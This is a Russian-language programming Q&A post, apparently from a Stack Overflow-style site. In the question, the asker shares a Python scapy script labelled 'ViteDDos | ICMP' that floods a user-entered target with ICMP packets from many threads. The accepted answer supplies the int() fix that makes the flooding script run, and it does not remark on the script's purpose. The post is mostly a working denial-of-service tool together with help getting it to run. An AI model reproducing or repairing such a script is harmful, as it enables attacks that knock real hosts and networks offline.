# Ошибка в коде python, с def

Tags: python, threading

```
import random, os
from scapy.all import *
def DestinationIP():
        dstIP = input("IP: ")
        return dstIP
os.system("figlet ViteDDos | ICMP")
host = input("Target > ")

thr = input("Threads: ")
ta = DestinationIP()
def sendg():
        while True:
                send(IP(dst=host)/ICMP())

thread_pool = [
        Thread(target=sendg,  args=[]) for _ in range(thr)
]
for thread in thread_pool:
        thread.start()
```

Это мой код.
Когда я запускаю, ввожу всё, выходит ошибка:
Traceback (most recent call last):
File "vdic.py", line 16, in 
Thread(target=sendg,  args=[]) for _ in range(thr)
TypeError: 'str' object cannot be interpreted as an integer

Answer (score 0, accepted):

Замените
`thr = input("Threads: ")` на `thr = int(input("Threads: "))`

Имело смысл, переведя ошибку, поискать в строке 16 на возможные значения `str`и найдя, подумать, почему они не `int`, если должны быть. Так бы и нашли ошибку.

Помните, что `input()` всегда даёт значения типа `str`.